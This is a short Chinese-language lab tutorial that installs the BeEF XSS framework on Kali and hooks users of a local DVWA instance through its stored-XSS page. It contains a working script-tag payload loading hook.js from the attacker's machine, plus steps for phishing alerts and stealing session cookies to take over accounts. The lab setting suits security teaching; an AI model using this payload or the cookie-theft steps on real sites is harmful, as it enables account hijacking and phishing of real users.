1. 安装beef-xss
由于我之前使用的kali2021的key过期了,后面搞了很久也没搞好,所以我下载了kali2023版的来进行操作。
-
更新kali
apt-get update
使用这条命令更新kali时如果出现错误不要慌,先执行下面的命令看一下可以安装beef-xss吗,如果不行那就要去网上找解决办法了。或者直接下载新的kali。大家可以在这里下载kali2023,kali-images-kali-2023.1安装包下载_开源镜像站-阿里云 (aliyun.com)。
- 下载beef-xss
sudo apt-get install beef-xss
- 安装fix-broken
apt --fix-broken install
ok,到这里beef-xss就下载完成了。
2. 启动beef-xss
使用sudo beef-xss
启动。刚开始要设置密码。然后我们访问 http://(kali的ip地址):3000/ui/panel
用户名为beef,密码为设置的密码。
3. 登录dvwa
选择存储型xss,在文本框中输入
<script src="http://192.168.6.155:3000/hook.js"></script>
这个时候我们就可以在beef-xss中可以看到已经控制到目标主机了。
接下来为了演示存储型xss,我们将这个删除,然后重新登录dvwa时。一旦我们访问xss(stored),我们的主机就被控制。
我们使用另外一个用户登录。大家可以到dvwa数据库里面查找用户。
可以看到smithy这个用户也被控制了。
我们可以发送警告信息进行钓鱼
或者获取cookie,从而登录受害者账号。这里直接使用http://127.0.0.1/DVWA-master/
访问,bp拦截修改cookie即可。
这里我是用的是火狐的Cookie-Editor插件修改的。修改完成后直接访问即可。